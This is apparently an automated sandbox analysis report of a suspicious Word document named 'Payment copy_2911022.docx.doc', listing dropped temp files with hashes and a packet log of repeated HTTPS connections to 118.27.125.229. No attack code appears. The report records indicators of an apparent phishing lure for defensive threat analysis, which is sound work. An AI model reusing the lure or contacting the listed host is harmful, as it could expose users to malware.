Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DEABB9E.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8032 |
Entropy (8bit): | 6.106485999431441 |
Encrypted: | false |
SSDEEP: | 96:+Y8gdLn2wOlVE82u5WUqhy0J2bnR5PojA6pAohjN6pKpGPZCzYw9gz1fUIN3U0s:+Y7L2wO9IUNv5PoV6w6peGRx7pE0s |
MD5: | 7934E5C18F2C7C53DCE7C8C7CE55125D |
SHA1: | 8C75630C574D0745E4F3B71B26057C990E2BB467 |
SHA-256: | 7C92FD542BC5E2B201FB2DE4FC1DACE37FF9DFC02CE40FD1BD26E61ED41DB3EA |
SHA-512: | 1E8D31AF033C0E3DF7D4DCF427D92702F733E13CE1686E0E1BDB0711E882F2AE18C479F363A535B366D1A4838E363C163513B7091DD81CBD9961D18C1C293C13 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1A7B07.jpg
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 111840 |
Entropy (8bit): | 7.447827528335342 |
Encrypted: | false |
SSDEEP: | 3072:/y1vPicYqXVc2XcRz09vkDMaIRFzOuPiSlKd9Y:qdfYqX6G00zfaSlWY |
MD5: | 4D697D690AB2D1BAC4998162A6EEAE07 |
SHA1: | 6864EAD35FB3B3FBE354AC8D7BC3AFA3204B9522 |
SHA-256: | 23D679960625F65787692D74E87E324E5304B7F923E340322575D330FE510450 |
SHA-512: | 201266787A62F1603C7B908A74B7FBE5A06E38CF581B8B8F8D8D56F9804C6020822E1C3B799321980DAD326E751CE9E0C969979BC96D4A62AC25D7C4259574A9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{351482B1-26A6-4A40-B9B2-E50157B39785}.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4608 |
Entropy (8bit): | 2.2918709222363574 |
Encrypted: | false |
SSDEEP: | 24:rNKOUp03SHIDFJIDfrBexrBez7HrBeIiOID:rNKKtKfrBWrBYjrB/iD |
MD5: | DDD1A7B7584FE963025B7877753363E9 |
SHA1: | 3231DC3627E692457A46A5A232F3C08EED393593 |
SHA-256: | 56E7BBA8F55A2766D6BFE10F89AC631AE171A800B017FC5E7BFA1B86830DFFAA |
SHA-512: | 34F084E344268DE2F67AD2674B6E2A7915E2F9023F79ED3E2C6BB3A12300321097C7A1139CE147D7B7BCFBBD2226FCE086094355B184053172A1E26454D55D5D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2DAED936-6AE5-4EA6-A2A6-98457564935D}.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 22016 |
Entropy (8bit): | 3.726896001733367 |
Encrypted: | false |
SSDEEP: | 192:L/iOgOnpOwOdOiA4vzxO6LvF6iCs3LGL9Ql/XWMjZcLPOiCzS2zcFLNkIsehNACh:LTl0V4VF63Nr+eE1 |
MD5: | 2D3B22EB9A941A88E1FBE9CC6F0AD47B |
SHA1: | 3BABC72BE2E9724860AFCBC84F6F084BCE67C05A |
SHA-256: | 077B64253FAF9C648A350EEB76A4583D396A9F390D2732B73E024DE756ECB52F |
SHA-512: | B913ED1B0EA6AF625102C2E48C20084408B7C34067EF127FC4A0BFBC8B447A56D5F45659D6FE89694BF1224CB411CFF7EA76444361F036567B2EECA6A738CE41 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D442B920-91E2-4DCA-989E-AADAC9D5BA07}.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1024 |
Entropy (8bit): | 0.05390218305374581 |
Encrypted: | false |
SSDEEP: | 3:ol3lYdn:4Wn |
MD5: | 5D4D94EE7E06BBB0AF9584119797B23A |
SHA1: | DBB111419C704F116EFA8E72471DD83E86E49677 |
SHA-256: | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 |
SHA-512: | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.02557421810106493 |
Encrypted: | false |
SSDEEP: | 6:I3DPce3FvxggLRd68ShIKfljt3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPJpSjbvYg3J/ |
MD5: | 79629860A8A7062100568BA988AA92E5 |
SHA1: | 04EB84E685B4ED1633C9A24F945CA4E4EFF440F9 |
SHA-256: | B4490EEF80275645ADF8E6DA434925E61B0C7E7CEC78BDA28C80A45593674C25 |
SHA-512: | 44032143469737F083D1B979DD04BBC9C28DB3584812810DE216ADE8E0763D6FDBE6235F73A5582D86839EE63C963712BA36349F865723509E8D4A909DA3B45E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.025598214431537702 |
Encrypted: | false |
SSDEEP: | 6:I3DPcA2VvxggLRqNf/XiZkqxFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPIZsXGdvYg3J/ |
MD5: | 4E0BB04AF2E5963F5B13FE28926EA850 |
SHA1: | A1F8759D658FE4FD793A0C6756BE56CF1BAA6C5E |
SHA-256: | 144E84C6E11326F22EC9934B0C473BD33708C4D1AAC32A967D083E7A0F7B9742 |
SHA-512: | 4037BD00DB042D87AADE73C529F218778ABF1675C6BD37F8AA25F4CE38E18E77470661710711D16B7D809AAEE9288C032F7A31A1CF46B882203D53A289CF4975 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1089 |
Entropy (8bit): | 4.586578560978497 |
Encrypted: | false |
SSDEEP: | 12:8ovgXg/XAlCPCHaXNBQtB/SxXX+Wdl91UWY5iEcH4icvbTXevyXl4KDtZ3YilMMe:8i/XT9SUXmWZEcHreHXevy1ZDv3q+u7D |
MD5: | 42568C6DD23F1300A99ED8669616B647 |
SHA1: | 205A7AEEA5E8CC501DE65B0398F6511123590B6E |
SHA-256: | 403995B5D0C5466BCD2EA065BCFA60259DE797DA2B36290DC6D140F2FEBEF164 |
SHA-512: | 16464D686024260D930ECA3255461A6130CD7B0B33A9474CAE72F7A03BBEE55B733BFB8195594F31E65A07FEC80ECBE9A06FFB1C91C4336430D251E9E4B30DBD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 101 |
Entropy (8bit): | 4.8491372958945425 |
Encrypted: | false |
SSDEEP: | 3:bDuMJltDLhVjO1LXJFSmX1OeLhVjO1LXJFSv:bCmDFVyBZFEeFVyBZFc |
MD5: | 83166E435F433132ECCE71984113EC6B |
SHA1: | 630B8125CF2F042D3C939B375300C4A03B849927 |
SHA-256: | DEE2789C5DBCFF0EA579537C38D15E0626092269B5842B7D1BAAFBA4DC43F308 |
SHA-512: | DFE14FDBE0BC45AD547A41CE549670CD1F9B39210E698A09BF558D643B7159D740E7C52A2773F6F9E44AD9FF07DE877C8FDD709864CA8668556B86AA82135D9B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll |
MD5: | D9C8F93ADB8834E5883B5A8AAAC0D8D9 |
SHA1: | 23684CCAA587C442181A92E722E15A685B2407B1 |
SHA-256: | 116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11 |
SHA-512: | 7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2 |
Entropy (8bit): | 1.0 |
Encrypted: | false |
SSDEEP: | 3:Qn:Qn |
MD5: | F3B25701FE362EC84616A93A45CE9998 |
SHA1: | D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB |
SHA-256: | B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209 |
SHA-512: | 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll |
MD5: | D9C8F93ADB8834E5883B5A8AAAC0D8D9 |
SHA1: | 23684CCAA587C442181A92E722E15A685B2407B1 |
SHA-256: | 116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11 |
SHA-512: | 7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.994989792624349 |
TrID: |
|
File name: | Payment copy_2911022.docx.doc |
File size: | 110504 |
MD5: | cd3dbd5f1d468da826581361b619b393 |
SHA1: | 9d5fc2d99aec7c8c18d8af7267b4a31801fda770 |
SHA256: | 1c6189f068ee3870e1d41511bd55c02cef9d98a816a963a26f95ff0b6becea1f |
SHA512: | 91ae486d3b8a687ce2e994ee179161896f71f6c0e973b1ebd52ff856753ccc8cb5b7e0c7890c87158a558e74e061281d4bf6dd37e9941b3593a3ccbd77f71bdf |
SSDEEP: | 1536:oI2CqvURAICmRMMlzJEGEBwNQFgbLndOxR8qn7CJcsqKqLzDOfFGpt+rlTuq:vTADANPLNQUkRhnm9qKqqgt+r0q |
TLSH: | 56B3021A16401374FBCF83FCF954890FD85B2974EB05BE441E9CEEE8A4AD3411D2D669 |
File Content Preview: | PK........h..U...p`...T.......[Content_Types].xmlUT...H..cH..cH..c.T.N.0..#....U...B.i.,G.D......o.....7%B(4.m/..y.X..O.Zek.AZS.Q1$..n.4uI......BdF0e..d..L'.W...A..mBI.1.{J._.f....V*.5.x.5u......pxK.5.L.c. ..#Tl.b....&...H....WI.sJr..N.F.r....2.......@h.C |
Icon Hash: | e4eea2aaa4b4b4a4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 20, 2022 14:08:01.217870951 CET | 49175 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:01.217945099 CET | 443 | 49175 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:01.218025923 CET | 49175 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:01.240758896 CET | 49175 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:01.240813971 CET | 443 | 49175 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:01.866564035 CET | 443 | 49175 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:01.866779089 CET | 49175 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:01.874716997 CET | 49175 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:01.874756098 CET | 443 | 49175 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:01.875518084 CET | 443 | 49175 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:01.875665903 CET | 49175 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:02.181982040 CET | 49175 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:02.182032108 CET | 443 | 49175 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:02.497220039 CET | 443 | 49175 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:02.497322083 CET | 49175 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:02.497358084 CET | 443 | 49175 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:02.497422934 CET | 49175 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:02.512947083 CET | 49175 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:02.513202906 CET | 443 | 49175 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:02.513262033 CET | 49175 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:02.513427973 CET | 49175 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:04.203759909 CET | 49176 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:04.203811884 CET | 443 | 49176 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:04.203902960 CET | 49176 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:04.204251051 CET | 49176 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:04.204268932 CET | 443 | 49176 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:04.784801006 CET | 443 | 49176 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:04.785031080 CET | 49176 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:04.806432009 CET | 49176 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:04.806485891 CET | 443 | 49176 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:04.807271004 CET | 443 | 49176 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:04.837964058 CET | 49176 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:04.838026047 CET | 443 | 49176 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:05.358891010 CET | 443 | 49176 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:05.358973026 CET | 443 | 49176 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:05.359105110 CET | 49176 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:05.359148026 CET | 49176 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:05.359164953 CET | 443 | 49176 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:09.436860085 CET | 49177 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:09.436899900 CET | 443 | 49177 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:09.436964989 CET | 49177 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:09.438842058 CET | 49177 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:09.438859940 CET | 443 | 49177 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:10.057029963 CET | 443 | 49177 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:10.057256937 CET | 49177 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:10.064673901 CET | 49177 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:10.064733982 CET | 443 | 49177 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:10.065263987 CET | 443 | 49177 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:10.099788904 CET | 49177 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:10.099848986 CET | 443 | 49177 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:10.668241978 CET | 443 | 49177 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:10.668354988 CET | 443 | 49177 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:10.668445110 CET | 49177 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:10.668802977 CET | 49177 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:10.668828964 CET | 443 | 49177 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:10.668850899 CET | 49177 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:10.668858051 CET | 443 | 49177 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:10.668876886 CET | 49177 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:10.668881893 CET | 443 | 49177 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:10.669096947 CET | 49178 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:10.669173956 CET | 443 | 49178 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:10.669255018 CET | 49178 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:10.669528008 CET | 49178 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:10.669563055 CET | 443 | 49178 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:11.254982948 CET | 443 | 49178 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:11.257827997 CET | 49178 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:11.257889032 CET | 443 | 49178 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:11.259048939 CET | 49178 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:11.259067059 CET | 443 | 49178 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:11.835972071 CET | 443 | 49178 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:11.837253094 CET | 49178 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:11.868597984 CET | 49179 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:11.868653059 CET | 443 | 49179 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:11.868730068 CET | 49179 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:11.868887901 CET | 49179 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:11.868901968 CET | 443 | 49179 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:12.451721907 CET | 443 | 49179 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:12.451900005 CET | 49179 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:12.474200964 CET | 49179 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:12.474298000 CET | 443 | 49179 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:12.474988937 CET | 443 | 49179 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:12.475095034 CET | 49179 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:12.498498917 CET | 49179 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:12.498554945 CET | 443 | 49179 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:13.019915104 CET | 443 | 49179 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:13.020112038 CET | 49179 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:13.020152092 CET | 443 | 49179 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:13.020190001 CET | 443 | 49179 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:13.020262003 CET | 49179 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:13.020289898 CET | 49179 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:13.020311117 CET | 443 | 49179 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:13.020364046 CET | 49179 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:13.020445108 CET | 443 | 49179 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:13.020512104 CET | 49179 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:13.441339970 CET | 49179 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:13.441390038 CET | 443 | 49179 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:13.619105101 CET | 49180 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:13.619155884 CET | 443 | 49180 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:13.619230032 CET | 49180 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:13.619653940 CET | 49180 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:13.619667053 CET | 443 | 49180 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:14.242017984 CET | 443 | 49180 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:14.242222071 CET | 49180 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:14.268954992 CET | 49180 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:14.269001007 CET | 443 | 49180 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:14.272497892 CET | 49180 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:14.272530079 CET | 443 | 49180 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:14.858989000 CET | 443 | 49180 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:14.859188080 CET | 49180 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:14.859191895 CET | 443 | 49180 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:14.859265089 CET | 49180 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:15.058785915 CET | 49180 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:15.058836937 CET | 443 | 49180 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:15.058862925 CET | 49180 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:15.058900118 CET | 49180 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:15.265033007 CET | 49181 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:15.265104055 CET | 443 | 49181 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:15.265218019 CET | 49181 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:15.265491009 CET | 49181 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:15.265512943 CET | 443 | 49181 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:15.888360977 CET | 443 | 49181 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:15.888545036 CET | 49181 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:15.896652937 CET | 49181 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:15.896703005 CET | 443 | 49181 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:15.913521051 CET | 49181 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:15.913566113 CET | 443 | 49181 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:16.544578075 CET | 443 | 49181 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:16.544749022 CET | 49181 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:16.544774055 CET | 443 | 49181 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:16.544828892 CET | 49181 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:16.569941998 CET | 49181 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:16.569987059 CET | 49181 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:16.890336037 CET | 49182 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:16.890373945 CET | 443 | 49182 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:16.890521049 CET | 49182 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:16.890714884 CET | 49182 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:16.890727043 CET | 443 | 49182 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:17.477227926 CET | 443 | 49182 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:17.477560043 CET | 49182 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:17.489660025 CET | 49182 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:17.489686966 CET | 443 | 49182 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:17.490612984 CET | 443 | 49182 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:17.499675989 CET | 49182 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:17.499705076 CET | 443 | 49182 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:18.057207108 CET | 443 | 49182 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:18.057305098 CET | 443 | 49182 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:18.057375908 CET | 49182 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:18.057492971 CET | 49182 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:18.057512999 CET | 443 | 49182 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:18.105221987 CET | 49183 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:18.105273008 CET | 443 | 49183 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:18.105397940 CET | 49183 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:18.105638981 CET | 49183 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:18.105652094 CET | 443 | 49183 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:18.687180996 CET | 443 | 49183 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:18.687347889 CET | 49183 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:18.695395947 CET | 49183 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:18.695436001 CET | 443 | 49183 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:18.695950985 CET | 443 | 49183 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:18.696038961 CET | 49183 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:18.707426071 CET | 49183 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:18.707463980 CET | 443 | 49183 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:19.355176926 CET | 443 | 49183 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:19.355252981 CET | 49183 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:19.355268955 CET | 443 | 49183 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:19.355314016 CET | 49183 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:19.355345011 CET | 443 | 49183 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:19.355421066 CET | 49183 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:19.355421066 CET | 49183 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:19.355448961 CET | 49183 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:19.414525032 CET | 49184 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:19.414580107 CET | 443 | 49184 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:19.414652109 CET | 49184 | 443 | 192.168.2.22 | 118.27.125.229 |
